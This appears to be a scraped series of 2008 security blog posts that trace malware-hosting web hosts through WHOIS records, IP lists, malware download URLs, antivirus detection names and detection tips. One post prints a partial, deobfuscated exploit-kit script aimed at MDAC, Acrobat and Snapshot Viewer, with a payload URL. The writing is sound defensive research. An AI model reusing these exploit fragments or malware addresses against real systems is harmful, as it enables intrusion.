To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24×01.hpg.ig.com.br/ree1.html
hxxp://gay24×01.hpg.ig.com.br/ree2.html
hxxp://gay24×02.hpg.ig.com.br/nl2.html
hxxp://gay24×02.hpg.ig.com.br/nl3.html
hxxp://gay24×02.hpg.ig.com.br/nl4.html
hxxp://gay24×02.hpg.ig.com.br/nl5.html
hxxp://gay24×02.hpg.ig.com.br/nl6.html
hxxp://gay24×02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

Another method I’d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”.  A quick search leads us to this article over at abuse.ch.

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Still Trade hosts a ton of fake/rogue anti virus domains and applications. We’ve seen these hosts pop up recently:

91.208.0.220
2008-12-01
scanner.rapidantivirus.com /setup/setup.exe – Fake AV

Trojan:Win32/FakePowav
FraudTool.Win32.ExtraAntivir.c
Win32/FakeAV!generic

91.208.0.221
2008-12-11
myprivatetubes09.net /cd/650/1749/wmpcdcs.exe – Zlob

DR/Zlob.Gen
TrojanDownloader:Win32/Renos.HB
Mal/Emogen-G

91.208.0.253
2008-12-03
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe – Zlob

Same as above

The following IPs are associated with malicious applications:

91.208.0.220
91.208.0.221
91.208.0.223
91.208.0.224
91.208.0.225
91.208.0.228
91.208.0.229
91.208.0.230
91.208.0.231
91.208.0.234
91.208.0.235
91.208.0.236
91.208.0.237
91.208.0.238
91.208.0.239
91.208.0.240
91.208.0.241
91.208.0.242
91.208.0.243
91.208.0.244
91.208.0.245
91.208.0.246
91.208.0.247
91.208.0.248
91.208.0.249
91.208.0.250
91.208.0.251
91.208.0.252
91.208.0.253
91.208.0.254

BISS also has a comprehensive list of domains and malware being served by these guys.

inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and it’s upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space:

92.62.100.0 – 92.62.101.255

92.62.100.68
2008-11-05
plotfive.cn /load.php

2008-11-12 /cache/doc.pdf

2008-11-22 /cache/doc.pdf

92.62.101.13
2008-10-24
tgspk.cn /zpl/pdf.php

92.62.101.53
2008-10-30
blufda.com /eez3a893/spl/pdf.pdf

2008-11-26 /u8899r5v/spl/pdf.pdf
/u8899r5v/exe.php

2008-12-17
kraspa.com /yg6cv7ar/spl/pdf.pdf

92.62.100.44
2008-09-18
92.62.100.44 /1/
/2/
92.62.100.43
2008-09-17
92.62.100.43 /1/
/2/

There’s quite a history here. From the looks of things, someone has been
moving around their malware from domain to domain on 92.62.101.53. All
of these sites are down as of this writing except kraspa.com. Lets dive
further into this site.

The first page I saw was kraspa.com /yg6cv7ar/spl/pdf.pdf however
this is not the whole story. When investigating that exact URL, pdf.pdf
is not found. This is curious as I saw the site earlier today. Backing up
to the root of kraspa.com, we get an index page. The index page contains
an iframe that points to a different directory. The malware author must
have coded his site to rotate directory names based on a certain criteria.
This makes investigation difficult if you can’t figure out where it will
send victims to next.

The next iframe I got contained:

src=”/ov9632l9/index.php”

The next page that comes into play is the exploit script index.php which
is detected as:

Trojan-Downloader.JS.Psyme.alv

Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and
the Microsoft Access Snapshot viewer. Here’s some of the script:

var p_url = “http://kraspa.com/ov9632l9/ztt.php”;
function MDAC(){

var nuc=”;
d8= 0;
var koSZV = document.createElement(”o”+nuc+”b”+nuc+”je”+nuc+”c”+nuc+”t”);
koSZV.setAttribute(”id”,”<”+nuc+”?=k”+nuc+”o”+nuc+”S”+nuc+”ZV?”+nuc+”>”);
[....]
function PDF()
{
document.write(’<iframe src=”spl/pdf.pdf” width=1 height=1 style=”display:none”></iframe>’);
[....]
function SS()
{
var arbitrary_file = p_url;
var dest = ‘C:/AUTOEXEC.BAT’;
document.write(”<object classid=’clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9′ id=’attack’></object>”);
[....]
if (MDAC()||PDF()||SS()) { }
Detections for the malicious pdf:

JS:Agent-BQ
Exploit.RealPlr.K

The payload is a file called ztt.php, here are a few of the detections:

Trojan.Win32.Delf.gpg
Troj/Dloadr-BZT
Trojan.Win32.Delf.fyl

A quick submission to Threat Expert (report) and Anubis (report) reveal
further binaries that are downloaded. The .dat files are not exes, but a
type of binary data file.

Of particular interest is 79.143.177.43, another Latvian host with a
small /24 network. Might be worth keeping your eyes open for them too.

inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT

Some detections for 20026.exe, and file.exe:

BDS/Hupigon.Gen
Trojan.FakeAlert.Gen!Pac.2

Trojan.Crypt.LooksLike.XPACK
Trojan.FakeAlert.Gen!Pac.2

The FakeAlert signatures are correct, the threat ultimatly installs some
fake anti virus / anti spyware application.

]]> http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/feed/ 2 http://www.martinsecurity.net/2008/12/16/sources-of-badness-portnap/ http://www.martinsecurity.net/2008/12/16/sources-of-badness-portnap/#comments Tue, 16 Dec 2008 15:05:27 +0000 martinse http://realsecurity.wordpress.com/?p=172 One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 – 84.243.197.255.

inetnum:        84.243.197.0 - 84.243.197.255
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed:        noc@grafix.nl 20081021
source:         RIPE
abuse-mailbox:  abuse@grafix.nl

84.243.196.136 2008-12-02 – site down
pro-scanner-online.com /2009/download/trial/A9installer_880473.exe

84.243.196.137 2008-12-02 – site down
protected-downloads.com /download/trial/AV360Install_77014205.exe

84.243.197.183 2008-11-20 – site down
protection-livescan.com /2009/download/trial/A9installer_880290.exe

role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
e-mail:         hostmaster@zlkon.lv
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed:        hostmaster@zlkon.lv 20081125
source:         RIPE
abuse-mailbox:  abuse@zlkon.lv

Based in Latvia, Zlkon seems to have a high ratio of bad IPs to it’s small
address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon
has two /24s 94.247.2.0 – 94.247.3.255.

% Information related to '94.247.0.0/21AS12553'

route:          94.247.0.0/21
descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed:        igors@pcexpress.lv 20081121
source:         RIPE

94.247.2.11
2008-12-02 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880135.exe

94.247.2.183
2008-12-09
fire-movie.com /download/Keygen.Image.for.DOS.2.08c3098.exe
Win32:Fabot
Trojan:Win32/Alureon.gen!J
Worm/AutoRun.ER

2008-12-02
spacekeys.net /download/windows311megaupload_3019.exe
Same as fire-movie.net above

2008-12-12
moonmovie.net /download/moonmovie.v.3.484.exe
Same as fire-movie.net above

94.247.2.215
2008-11-27 – not accessible
antivirus–plus.com /installer_00004.exe

94.247.2.222
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880147.exe

94.247.3.228
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880473.exe

2008-12-12
get-frsh-files.com /MCLiteodecVer.6.20467.exe
Same as files-upload.21.com below

2008-12-13
files-upload-21.com /MCLiteodecVer.6.20271.exe
TrojanDownloader:Win32/Renos.FH

94.247.2.231
2008-12-03 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880147.exe

94.247.3.232
2008-12-14
codecdownload.3d-softwareportal.com /exclusivemovie.1518.exe
TrojanDownloader:Win32/Renos.FU
Trojan.Win32.Undef.uhx

So we’ve got some fake antivirus, Renos, zlob, etc. Nothing overly terrible like a banking trojan or spam bot but who knows what else is being hosted in Zlkon’s address space.

91.203.92.0/22
AS44997

netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: OTHER
address: Ukraine, Voznesensk, Lenina 52
remarks: ————————-
phone: +38-048-701-05-45
phone: +38-096-380-13-21
phone: +38-096-380-13-26
fax-no: +38-048-701-05-45
remarks: ————————-
e-mail: ipadmin@uatelecom.com.ua
abuse-mailbox: abuse@uatelecom.com.ua

We’ve seen lots of malware from their netblock:

91.203.92.138    2008-10-30 – site down
91.203.92.138    /mix/xcvb.pdf

91.203.92.47    2008-12-09 – site down
advancedscanner.com    /2009/download/trial/InstallAVv_880460.exe

91.203.93.25    2008-12-02
softwareformyvideo.com    /get/1xxx5912940/download.exe

Trojan-Dropper.Win32.Agent.abiq
TrojanDownloader:Win32/Renos.FS
Troj/Zlob-AOX

91.203.93.26    2008-12-02
91.203.93.26    /WinDefender2009.exe – fake AV

FraudTool.Win32.WinDefender.g
AntiVirus2008.AIJ

91.203.93.29    2008-12-03 (more on this below)
easywebsiteauditor.ru    /spl/load.php – SPAM Bot

Troj/Pushdo-G
TrojanDownloader:Win32/Cutwail.S
Trojan.Win32.Small.yrx

load.php (an exe) is downloaded from the index of /spl/. The exploit code has 2/38 detections, JS:Packed-X

91.203.93.68    2008-12-03 – site down
pcantivirusscan.com    /2009/download/trial/A9installertest_880135.exe

91.203.93.81    2008-11-27 - sites down
codecdownload.x-softportal.com    /k-codec.335.exe
2008-12-02     codecdownload.friendlysoftportal.com    /moviecodec.91.exe
2008-12-04     codecdownload.allfilesherefordownload.com    /moviecodec.136.exe

Since easywebsiteauditor.ru drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to 174.36.201.82

OrgName:    SoftLayer Technologies Inc.
OrgID:      SOFTL
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

GET /40E8001430303030303030303030303030303030303031306C00000
1A366000000007600000642EB00053098A9B3BE HTTP/1.0

HTTP/1.0 200 OK
Date: Fri, 12 Dec 2008 16:10:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT
Cache-Control: no-cache
Content-Length: 110604
Connection: close
Content-Type: application/octet-stream

The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various smtp servers and starts to send spam. There is also a side channel of some sort that it establishes to 69.46.20.65 over port 2065.

OrgName:    HIVELOCITY VENTURES CORP
OrgID:      HVC-3
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US

This traffic also seems obfuscated with the only readable string below:

L…..9ifnospam.0.exe_url..exe_url……..

From doing a little digigng, this threat really is Pushdo/Cutwail. It’s interesting that the exploit site is hosted in the Ukraine, but the C&Cs are located in the US.

Fireeye article
Secure Works article

Happy hunting!

I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community will prosper.

**Edit** Seems this post has already drummed up some interest from several parties.

Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.

Is all of LeaseWeb’s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way, I’m sure policing such a large address space has it’s challenges.

The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.

**Edit**

Given the recent interest in web hosts such as MCCOLO and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list, it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.

If I had more hosts, maybe I could call this series of articles “The week of shady web hosts”
Today’s host is AS16265 LeaseWeb AS Amsterdam, Netherlands.

netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
descr:          www.leaseweb.com
remarks:        Please send email to "abuse@leaseweb.com" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed:        ripe@leaseweb.com 20071015
source:         RIPE

Information related to '85.17.0.0/16AS16265'

route:          85.17.0.0/16
descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed:        ripe@ocom.com 20050311
changed:        ripe@ocom.com 20070610
source:         RIPE

We’ve got exploits and hostile payloads from several IPs in their ranges.
I haven’t had a chance to get virus total results however.

85.17.212.0 - 85.17.212.255
85.17.162.0 - 85.17.162.255
85.17.189.0 - 85.17.189.255
85.17.238.0 - 85.17.238.255

IP              Date       Domain/IP            URL

85.17.162.100   2008-12-08 ad-adnet.net		/xrun.tmp (exe payload)
                2008-11-06 infonews.ath.cx	/data.pdf (exploit)
85.17.212.137	2008-12-01 www.golfinau.com	/stat/index.htm (exploit)
85.17.212.134	2008-12-09 securefilecourier.com	/downloadsetupws.php (exe payload)
85.17.189.153	2008-10-14 www.zifirgad.info	/n_fia/pdf.php (exploit)
85.17.238.144	2008-12-03 85.17.238.144	/74812/a.php (exe payload)

Xentronix network (LeaseWeb)
85.17.166.128 - 85.17.166.255

85.17.166.139	2008-11-05 85.17.166.139	/css/pdf.php (exploit)
85.17.166.229	2008-09-19 85.17.166.229	/gtest2/pdf.php (exploit)
85.17.166.231	2008-10-15 85.17.166.231	/gtest2/pdf.php (exploit)

From an intrusion detection perspective, this can be quite easy. Everyone knows (or should know) that many attacks evade IDS detection and evade AV detection. This is quite unfortunate but there is an aspect of these attacks that is very easy to detect, the transfer of an executable file.

Once a web based malware attack, an IM worm, or a spammed email with a link to a malicious exe is successful a payload must be downloaded. This payload is almost always an executable file or maybe a compressed file like a zip/rar/cab, etc. The file exetention may be renamed to .gif or .php, but the content of the file doesn’t lie.

Simply write a snort signature to look for the presence of the MZ/PE header inside the files traversing your network.

We have had great success with this technique, in the last 4 days alone here are some exes traversing the network. I have included my observations beside each one.

193.142.244.29/perce.php – non exe extension
193.142.244.55/images/item_fedml.gif – non exe extension
212.95.51.126/style.exe – non meaningful name from an IP
59.34.197.63/exe1/b07.css – non exe extension
76.163.147.77/cp/z/ – no extension at all
85.17.238.144/74812/a.php – non exe extension
antisxp-2009.com/install/Installer.exe – probable fake AV
antivirusdefense.com/2009/download/trial/A9installertest_77014701.exe – probable fake AV
antivirus-protectionscan.com/2009/download/trial/A9installertest_880147.exe – probable fake AV
blufda.com/u8899r5v/exe.php – non exe extension
youtube.dyndns.dk/flash_update.exe – suspicious domain using a dynamic dns service
vmpmedias.com/download.php – non exe extension
net-ddos.com/youxi/Server.exe – suspicious domain (must be an amature to put ddos in their domain name), suspicious exe to be downloading from a website

Finding those took about 5 minutes of checking at the start of each work day.

The problem with this technique is volume. Thousands of executables traverse a large network everyday, so how does one sort through them all? This is another fairly simple question to answer. The majority of exes being transfered should be from known good sources such as Microsoft, Adobe, Sun, Goole, Apple, etc. Simply whitelist or filter out these domains or IPs. Once these have been eliminated, the pile shrinks drastically.

For example, in 4 days we saw 3,318 exes transfered, aproximately 2,300 of these were from the examples above. Whitelisting will cut out 69% of those. Once that is done, simply scroll through the list and ask yourself the following questions:

Do any exes transfered end in a different file extension?
Ex: exe.php

Are we seeing any bizzar looking domain names?
Ex: net-ddos.com

Are binaries being transfered from IPs with no domain associated with it?
Ex: 193.142.244.29/perce.php

Do the exe file names make sense with the domain they are coming from?
Ex: youtube.dyndns.dk/flash_update.exe (Why would someone download a flash update from a site called youtube?)

With all your new found knowledge of hostile files being sent around your network, new questions arise such as:

Is that network segment supposed to have internet access?
Did a user knowingly download it?
Were they compromised by a malicious website?
Did they click a link in an email?
Did our AV/IDS not catch the exploit attempt?
Was the file detected by AV?

Thankfully all these questions are yours to answer